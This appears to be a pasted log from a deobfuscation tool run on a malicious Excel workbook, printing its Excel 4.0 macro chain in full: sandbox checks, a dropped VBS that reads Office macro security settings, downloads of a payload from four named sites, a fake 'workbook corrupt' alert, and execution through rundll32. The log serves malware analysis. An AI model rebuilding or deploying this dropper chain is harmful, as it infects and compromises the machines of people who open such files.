Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\inf.4669.xls\inf.4669.xls
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\inf.4669.xls\inf.4669.xls
- Unencrypted xls file
- [Loading Cells]
- auto_open: auto_open->'VyNand2egLwRTDtMIW'!$BH$12271
- [Starting Deobfuscation]
- CELL:BH12271 , FullEvaluation , FORMULA("=CHAR(R[29606]C[-87])",VyNand2egLwRTDtMIW$FH$5452:$FH$5532)
- CELL:BH12272 , FullEvaluation , "=FORMULA(R[37662]C[104],R[7636]C[31])"
- CELL:BH12273 , FullEvaluation , "=FORMULA(R[-12942]C[63],R[4358]C[-58])"
- CELL:BH12274 , FullEvaluation , "=FORMULA(R[-16395]C[73],R[5082]C[-38])"
- CELL:BH12275 , FullEvaluation , ON.TIME(2020-06-26 11:40:51.991544,'VyNand2egLwRTDtMIW'!IG48282)
- CELL:IG48282 , FullEvaluation , "=CLOSE(FALSE)"
- CELL:IG48283 , FullEvaluation , "=APP.MAXIMIZE()"
- CELL:IG48284 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R18256C168),)"
- CELL:IG48285 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R18256C168))"
- CELL:IG48286 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R18256C168),)"
- CELL:IG48287 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R18256C168),)"
- CELL:IG48288 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R18256C168),)"
- CELL:IG48289 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R18256C168),)"
- CELL:IG48290 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R18256C168))"
- CELL:IG48291 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R18256C168))"
- CELL:IG48292 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R18256C168))"
- CELL:IG48293 , FullEvaluation , "=""C:\Users\Public\qyUV.vbs"""
- CELL:IG48294 , FullEvaluation , "=""C:\Users\Public\gzGD.txt"""
- CELL:IG48295 , FullEvaluation , "=FOPEN(R18267C168,3)"
- CELL:IG48296 , FullEvaluation , "=FWRITELN(R18269C168,""On Error Resume Next"")"
- CELL:IG48297 , FullEvaluation , "=FWRITELN(R18269C168,""Set VFYjmh = CreateObject(""""WScript.Shell"""")"")"
- CELL:IG48298 , FullEvaluation , "=FWRITELN(R18269C168,""Set Yt1jI = CreateObject(""""Scripting.FileSystemObject"""")"")"
- CELL:IG48299 , FullEvaluation , "=FWRITELN(R18269C168,""Set BIj = Yt1jI.CreateTextFile(""""""&R18268C168&"""""", True)"")"
- CELL:IG48300 , FullEvaluation , "=FWRITELN(R18269C168,""BIj.WriteLine(VFYjmh.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
- CELL:IG48301 , FullEvaluation , "=FWRITELN(R18269C168,""BIj.Close"")"
- CELL:IG48302 , FullEvaluation , "=FCLOSE(R18269C168)"
- CELL:IG48303 , FullEvaluation , "=EXEC(""explorer.exe ""&R18267C168&"""")"
- CELL:IG48304 , FullEvaluation , "=WHILE(ISERROR(FILES(R18268C168)))"
- CELL:IG48305 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
- CELL:IG48306 , FullEvaluation , "=NEXT()"
- CELL:IG48307 , FullEvaluation , "=FILE.DELETE(R18267C168)"
- CELL:IG48308 , FullEvaluation , "=FOPEN(R18268C168,2)"
- CELL:IG48309 , FullEvaluation , "=FREAD(R18282C168,100)"
- CELL:IG48310 , FullEvaluation , "=FCLOSE(R18282C168)"
- CELL:IG48311 , FullEvaluation , "=FILE.DELETE(R18268C168)"
- CELL:IG48312 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R18283C168)),GOTO(R18256C168),)"
- CELL:IG48313 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R39084C183),GOTO(R23779C121))"
- CELL:IG48314 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.134456,'VyNand2egLwRTDtMIW'!EG10619)
- CELL:EG10619 , FullEvaluation , FORMULA("=FORMULA(R[37662]C[104],R[7636]C[31])",VyNand2egLwRTDtMIW$EG$10620:$EG$10651)
- CELL:EG10620 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[7636]C[31])
- CELL:EG10621 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[7636]C[31])
- CELL:EG10622 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R18256C168),)",R[7636]C[31])
- CELL:EG10623 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R18256C168))",R[7636]C[31])
- CELL:EG10624 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R18256C168),)",R[7636]C[31])
- CELL:EG10625 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R18256C168),)",R[7636]C[31])
- CELL:EG10626 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R18256C168),)",R[7636]C[31])
- CELL:EG10627 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R18256C168),)",R[7636]C[31])
- CELL:EG10628 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R18256C168))",R[7636]C[31])
- CELL:EG10629 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R18256C168))",R[7636]C[31])
- CELL:EG10630 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R18256C168))",R[7636]C[31])
- CELL:EG10631 , FullEvaluation , FORMULA("=""C:\Users\Public\qyUV.vbs""",R[7636]C[31])
- CELL:EG10632 , FullEvaluation , FORMULA("=""C:\Users\Public\gzGD.txt""",R[7636]C[31])
- CELL:EG10633 , FullEvaluation , FORMULA("=FOPEN(R18267C168,3)",R[7636]C[31])
- CELL:EG10634 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""On Error Resume Next"")",R[7636]C[31])
- CELL:EG10635 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""Set VFYjmh = CreateObject(""""WScript.Shell"""")"")",R[7636]C[31])
- CELL:EG10636 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""Set Yt1jI = CreateObject(""""Scripting.FileSystemObject"""")"")",R[7636]C[31])
- CELL:EG10637 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""Set BIj = Yt1jI.CreateTextFile(""""""&R18268C168&"""""", True)"")",R[7636]C[31])
- CELL:EG10638 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""BIj.WriteLine(VFYjmh.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[7636]C[31])
- CELL:EG10639 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""BIj.Close"")",R[7636]C[31])
- CELL:EG10640 , FullEvaluation , FORMULA("=FCLOSE(R18269C168)",R[7636]C[31])
- CELL:EG10641 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R18267C168&"""")",R[7636]C[31])
- CELL:EG10642 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R18268C168)))",R[7636]C[31])
- CELL:EG10643 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[7636]C[31])
- CELL:EG10644 , FullEvaluation , FORMULA("=NEXT()",R[7636]C[31])
- CELL:EG10645 , FullEvaluation , FORMULA("=FILE.DELETE(R18267C168)",R[7636]C[31])
- CELL:EG10646 , FullEvaluation , FORMULA("=FOPEN(R18268C168,2)",R[7636]C[31])
- CELL:EG10647 , FullEvaluation , FORMULA("=FREAD(R18282C168,100)",R[7636]C[31])
- CELL:EG10648 , FullEvaluation , FORMULA("=FCLOSE(R18282C168)",R[7636]C[31])
- CELL:EG10649 , FullEvaluation , FORMULA("=FILE.DELETE(R18268C168)",R[7636]C[31])
- CELL:EG10650 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R18283C168)),GOTO(R18256C168),)",R[7636]C[31])
- CELL:EG10651 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R39084C183),GOTO(R23779C121))",R[7636]C[31])
- CELL:EG10652 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.145446,'VyNand2egLwRTDtMIW'!FL18257)
- CELL:FL18257 , PartialEvaluation , APP.MAXIMIZE()
- CELL:FL18258 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R18256C168),)
- CELL:FL18259 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R18256C168))
- CELL:FL18260 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R18256C168),)
- CELL:FL18261 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R18256C168),)
- CELL:FL18262 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R18256C168),)
- CELL:FL18263 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R18256C168),)
- CELL:FL18264 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R18256C168))
- CELL:FL18265 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R18256C168))
- CELL:FL18266 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R18256C168))
- CELL:FL18266 , FullEvaluation , [TRUE]
- CELL:FL18267 , FullEvaluation , "C:\Users\Public\qyUV.vbs"
- CELL:FL18268 , FullEvaluation , "C:\Users\Public\gzGD.txt"
- CELL:FL18269 , FullEvaluation , FOPEN("C:\Users\Public\qyUV.vbs",3)
- CELL:FL18270 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","On Error Resume Next")
- CELL:FL18271 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","Set VFYjmh = CreateObject(""WScript.Shell"")")
- CELL:FL18272 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","Set Yt1jI = CreateObject(""Scripting.FileSystemObject"")")
- CELL:FL18273 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","Set BIj = Yt1jI.CreateTextFile(""C:\Users\Public\gzGD.txt"", True)")
- CELL:FL18274 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","BIj.WriteLine(VFYjmh.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
- CELL:FL18275 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","BIj.Close")
- CELL:FL18276 , PartialEvaluation , FCLOSE("C:\Users\Public\qyUV.vbs")
- CELL:FL18277 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\qyUV.vbs")
- CELL:FL18278 , PartialEvaluation , WHILE(ISERROR(FILES(R18268C168)))
- CELL:FL18281 , PartialEvaluation , FILE.DELETE("C:\Users\Public\qyUV.vbs")
- CELL:FL18282 , FullEvaluation , FOPEN("C:\Users\Public\gzGD.txt",2)
- CELL:FL18283 , PartialEvaluation , FREAD("C:\Users\Public\gzGD.txt",100)
- CELL:FL18284 , PartialEvaluation , FCLOSE("C:\Users\Public\gzGD.txt")
- CELL:FL18285 , PartialEvaluation , FILE.DELETE("C:\Users\Public\gzGD.txt")
- CELL:FL18286 , FullBranching , IF(ISNUMBER(SEARCH("1",R18283C168)),GOTO(R18256C168),)
- CELL:FL18286 , FullEvaluation , [TRUE] GOTO(R18256C168)
- CELL:FL18256 , End , CLOSE(FALSE)
- CELL:FL18286 , FullEvaluation , [FALSE]
- CELL:FL18287 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R39084C183),GOTO(R23779C121))
- CELL:FL18287 , FullEvaluation , [TRUE] GOTO(R39084C183)
- CELL:GA39084 , FullEvaluation , "=""C:\Users\Public\OwP8Hxu4.html"""
- CELL:GA39085 , FullEvaluation , "=""https://estudiolacazezancarini.com/wp-crunch.php"""
- CELL:GA39086 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56385C62,R56384C62,0,0)"
- CELL:GA39087 , FullEvaluation , "=FILES(R56384C62)"
- CELL:GA39088 , FullEvaluation , "=IF(ISERROR(R56387C62),GOTO(R56394C62),)"
- CELL:GA39089 , FullEvaluation , "=FOPEN(R56384C62)"
- CELL:GA39090 , FullEvaluation , "=FSIZE(R56389C62)"
- CELL:GA39091 , FullEvaluation , "=FCLOSE(R56389C62)"
- CELL:GA39092 , FullEvaluation , "=IF(R56390C62<40000,,GOTO(R56411C62))"
- CELL:GA39093 , FullEvaluation , "=""https://germdisruptor.com/wp-crunch.php"""
- CELL:GA39094 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56393C62,R56384C62,0,0)"
- CELL:GA39095 , FullEvaluation , "=FILES(R56384C62)"
- CELL:GA39096 , FullEvaluation , "=IF(ISERROR(R56395C62),GOTO(R56402C62),)"
- CELL:GA39097 , FullEvaluation , "=FOPEN(R56384C62)"
- CELL:GA39098 , FullEvaluation , "=FSIZE(R56397C62)"
- CELL:GA39099 , FullEvaluation , "=FCLOSE(R56397C62)"
- CELL:GA39100 , FullEvaluation , "=IF(R56398C62<40000,,GOTO(R56411C62))"
- CELL:GA39101 , FullEvaluation , "=""https://gurukal.in/wp-crunch.php"""
- CELL:GA39102 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56401C62,R56384C62,0,0)"
- CELL:GA39103 , FullEvaluation , "=FILES(R56384C62)"
- CELL:GA39104 , FullEvaluation , "=IF(ISERROR(R56403C62),GOTO(R56410C62),)"
- CELL:GA39105 , FullEvaluation , "=FOPEN(R56384C62)"
- CELL:GA39106 , FullEvaluation , "=FSIZE(R56405C62)"
- CELL:GA39107 , FullEvaluation , "=FCLOSE(R56405C62)"
- CELL:GA39108 , FullEvaluation , "=IF(R56406C62<40000,,GOTO(R56411C62))"
- CELL:GA39109 , FullEvaluation , "=""https://indoeducation.com/wp-crunch.php"""
- CELL:GA39110 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56409C62,R56384C62,0,0)"
- CELL:GA39111 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
- CELL:GA39112 , FullEvaluation , "=ALERT(R56411C62)"
- CELL:GA39113 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
- CELL:GA39114 , FullEvaluation , "=R56384C62&"",DllRegisterServer"""
- CELL:GA39115 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R56413C62,R56414C62,0,5)"
- CELL:GA39116 , FullEvaluation , "=GOTO(R18256C168)"
- CELL:GA39117 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.343324,'VyNand2egLwRTDtMIW'!DP52025)
- CELL:DP52025 , FullEvaluation , FORMULA("=FORMULA(R[-12942]C[63],R[4358]C[-58])",VyNand2egLwRTDtMIW$DP$52026:$DP$52058)
- CELL:DP52026 , FullEvaluation , FORMULA("=""C:\Users\Public\OwP8Hxu4.html""",R[4358]C[-58])
- CELL:DP52027 , FullEvaluation , FORMULA("=""https://estudiolacazezancarini.com/wp-crunch.php""",R[4358]C[-58])
- CELL:DP52028 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56385C62,R56384C62,0,0)",R[4358]C[-58])
- CELL:DP52029 , FullEvaluation , FORMULA("=FILES(R56384C62)",R[4358]C[-58])
- CELL:DP52030 , FullEvaluation , FORMULA("=IF(ISERROR(R56387C62),GOTO(R56394C62),)",R[4358]C[-58])
- CELL:DP52031 , FullEvaluation , FORMULA("=FOPEN(R56384C62)",R[4358]C[-58])
- CELL:DP52032 , FullEvaluation , FORMULA("=FSIZE(R56389C62)",R[4358]C[-58])
- CELL:DP52033 , FullEvaluation , FORMULA("=FCLOSE(R56389C62)",R[4358]C[-58])
- CELL:DP52034 , FullEvaluation , FORMULA("=IF(R56390C62<40000,,GOTO(R56411C62))",R[4358]C[-58])
- CELL:DP52035 , FullEvaluation , FORMULA("=""https://germdisruptor.com/wp-crunch.php""",R[4358]C[-58])
- CELL:DP52036 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56393C62,R56384C62,0,0)",R[4358]C[-58])
- CELL:DP52037 , FullEvaluation , FORMULA("=FILES(R56384C62)",R[4358]C[-58])
- CELL:DP52038 , FullEvaluation , FORMULA("=IF(ISERROR(R56395C62),GOTO(R56402C62),)",R[4358]C[-58])
- CELL:DP52039 , FullEvaluation , FORMULA("=FOPEN(R56384C62)",R[4358]C[-58])
- CELL:DP52040 , FullEvaluation , FORMULA("=FSIZE(R56397C62)",R[4358]C[-58])
- CELL:DP52041 , FullEvaluation , FORMULA("=FCLOSE(R56397C62)",R[4358]C[-58])
- CELL:DP52042 , FullEvaluation , FORMULA("=IF(R56398C62<40000,,GOTO(R56411C62))",R[4358]C[-58])
- CELL:DP52043 , FullEvaluation , FORMULA("=""https://gurukal.in/wp-crunch.php""",R[4358]C[-58])
- CELL:DP52044 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56401C62,R56384C62,0,0)",R[4358]C[-58])
- CELL:DP52045 , FullEvaluation , FORMULA("=FILES(R56384C62)",R[4358]C[-58])
- CELL:DP52046 , FullEvaluation , FORMULA("=IF(ISERROR(R56403C62),GOTO(R56410C62),)",R[4358]C[-58])
- CELL:DP52047 , FullEvaluation , FORMULA("=FOPEN(R56384C62)",R[4358]C[-58])
- CELL:DP52048 , FullEvaluation , FORMULA("=FSIZE(R56405C62)",R[4358]C[-58])
- CELL:DP52049 , FullEvaluation , FORMULA("=FCLOSE(R56405C62)",R[4358]C[-58])
- CELL:DP52050 , FullEvaluation , FORMULA("=IF(R56406C62<40000,,GOTO(R56411C62))",R[4358]C[-58])
- CELL:DP52051 , FullEvaluation , FORMULA("=""https://indoeducation.com/wp-crunch.php""",R[4358]C[-58])
- CELL:DP52052 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56409C62,R56384C62,0,0)",R[4358]C[-58])
- CELL:DP52053 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[4358]C[-58])
- CELL:DP52054 , FullEvaluation , FORMULA("=ALERT(R56411C62)",R[4358]C[-58])
- CELL:DP52055 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[4358]C[-58])
- CELL:DP52056 , FullEvaluation , FORMULA("=R56384C62&"",DllRegisterServer""",R[4358]C[-58])
- CELL:DP52057 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R56413C62,R56414C62,0,5)",R[4358]C[-58])
- CELL:DP52058 , FullEvaluation , FORMULA("=GOTO(R18256C168)",R[4358]C[-58])
- CELL:DP52059 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.355318,'VyNand2egLwRTDtMIW'!BJ56384)
- CELL:BJ56384 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html"
- CELL:BJ56385 , FullEvaluation , "https://estudiolacazezancarini.com/wp-crunch.php"
- CELL:BJ56386 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://estudiolacazezancarini.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56387 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56388 , FullBranching , IF(ISERROR(R56387C62),GOTO(R56394C62),)
- CELL:BJ56388 , FullEvaluation , [TRUE] GOTO(R56394C62)
- CELL:BJ56394 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://germdisruptor.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56395 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56396 , FullBranching , IF(ISERROR(R56395C62),GOTO(R56402C62),)
- CELL:BJ56396 , FullEvaluation , [TRUE] GOTO(R56402C62)
- CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
- CELL:BJ56404 , FullEvaluation , [TRUE] GOTO(R56410C62)
- CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:BJ56413 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:BJ56414 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html,DllRegisterServer"
- CELL:BJ56415 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\OwP8Hxu4.html,DllRegisterServer",0,5)
- CELL:BJ56416 , FullEvaluation , GOTO(R18256C168)
- CELL:FL18256 , End , CLOSE(FALSE)
- CELL:BJ56404 , FullEvaluation , [FALSE]
- CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
- CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
- CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
- CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:BJ56413 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:BJ56414 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html,DllRegisterServer"
- CELL:BJ56415 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\OwP8Hxu4.html,DllRegisterServer",0,5)
- CELL:BJ56416 , FullEvaluation , GOTO(R18256C168)
- CELL:FL18256 , End , CLOSE(FALSE)
- CELL:BJ56396 , FullEvaluation , [FALSE]
- CELL:BJ56397 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
- CELL:BJ56398 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56399 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56400 , FullEvaluation , IF(R56398C62<40000,,GOTO(R56411C62))
- CELL:BJ56401 , FullEvaluation , "https://gurukal.in/wp-crunch.php"
- CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
- CELL:BJ56404 , FullEvaluation , [TRUE] GOTO(R56410C62)
- CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:BJ56413 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:BJ56414 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html,DllRegisterServer"
- CELL:BJ56404 , FullEvaluation , [FALSE]
- CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
- CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
- CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
- CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:BJ56388 , FullEvaluation , [FALSE]
- CELL:BJ56389 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
- CELL:BJ56390 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56391 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56392 , FullEvaluation , IF(R56390C62<40000,,GOTO(R56411C62))
- CELL:BJ56393 , FullEvaluation , "https://germdisruptor.com/wp-crunch.php"
- CELL:BJ56394 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://germdisruptor.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56395 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56396 , FullBranching , IF(ISERROR(R56395C62),GOTO(R56402C62),)
- CELL:BJ56396 , FullEvaluation , [TRUE] GOTO(R56402C62)
- CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
- CELL:BJ56404 , FullEvaluation , [TRUE] GOTO(R56410C62)
- CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56404 , FullEvaluation , [FALSE]
- CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
- CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
- CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
- CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:BJ56396 , FullEvaluation , [FALSE]
